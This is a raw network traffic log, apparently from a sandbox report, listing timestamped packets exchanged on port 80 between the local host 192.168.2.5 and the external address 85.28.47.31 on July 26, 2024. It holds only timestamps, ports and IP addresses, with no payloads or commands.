Jul 26, 2024 17:56:16.218704939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218727112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218740940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218760967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218775034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218801975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218811989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218844891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218858957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218880892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218894005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218914986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218933105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218945980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218955994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218978882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218991041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219012976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219027042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219046116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219060898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219079971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219090939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219114065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219126940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219146967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219161034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219181061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219192982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219214916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219228029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219248056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219260931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219280005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219297886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219315052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219325066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219347954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219362020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219382048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219397068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219415903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219429016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219449043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219464064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219485044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219496965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219518900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219532967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219552040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219563961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219584942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219597101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219616890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219630003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219650984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219664097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219683886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219695091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219717026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219728947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219749928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219764948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219783068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219794035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219830036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219834089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219877958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219882965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219917059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219932079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219952106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.219965935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.219985008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220000029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220017910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220031023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220051050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220063925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220098019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220175982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220208883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220222950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220242977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220256090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220277071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220290899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220310926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220325947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220344067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220356941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220377922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220390081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220412016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220424891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220444918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220458984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220490932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220495939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220530987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220542908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220563889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220578909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220597029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.220613003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.220638037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238554001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238590002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238624096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238627911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238672972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238675117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238693953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238709927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238720894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238744020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238754034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238778114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238786936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238811970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238823891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238843918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238853931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238878965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238887072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238914967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238920927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238948107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238959074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.238981009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.238995075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.239012957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.239027977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.239058971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.295955896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.295991898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296025991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296039104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296063900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296077967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296087027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296112061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296123981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296144009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296155930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296180010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.296189070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.296221018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317423105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317476034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317508936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317523956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317542076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317563057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317611933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317634106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317667007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317682028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317699909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317712069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317734003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317744017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317768097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317776918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317800999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317809105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317835093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.317843914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.317877054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318051100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318084955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318099022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318118095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318131924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318151951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318166971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318186045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318197012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318219900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318233013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318254948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318268061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318289042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318301916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318320990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318332911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318353891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318368912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318388939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318401098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318422079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318437099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318455935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318470001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318490982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318504095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318526030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.318540096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.318581104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319140911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319175005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319197893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319207907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319219112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319241047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319252968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319283009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319291115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319324017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319338083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319356918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319370985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319390059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319400072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319433928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319437027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319466114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319478989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319499016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319511890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319530964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319545984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319564104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319576979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319597960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319610119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319631100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319648981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319664955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319674969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319700003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319714069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319732904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319741964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319767952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319782019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319799900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319832087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319839001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319852114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319873095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.319889069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.319920063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320205927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320240021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320257902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320272923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320282936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320307016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320314884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320339918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320364952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320373058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320390940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320403099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320419073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320447922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320453882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320502996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320513964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320548058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320561886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320595026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320600033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320632935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320648909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320666075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320682049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320714951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320715904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320749998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320763111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320781946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320797920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320816994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320831060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320866108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320874929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320924044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320925951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320961952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.320971012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.320995092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321018934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321033955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321042061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321067095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321099997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321100950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321124077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321131945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321142912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321166039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321181059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321209908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321216106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321248055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321264029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321281910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321295023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321315050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321329117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321348906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321361065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321382046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321396112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321414948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321429968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321449041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321464062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321481943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321494102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321537971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321540117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321576118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321588993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321609020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321620941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321646929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321656942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321676016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.321688890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.321724892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.335825920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.335860968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.335892916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.335895061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.335936069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.335957050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.335963964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.335999966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336009026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336040974 CEST	49704	80	192.168.2.5	85.28.47.31
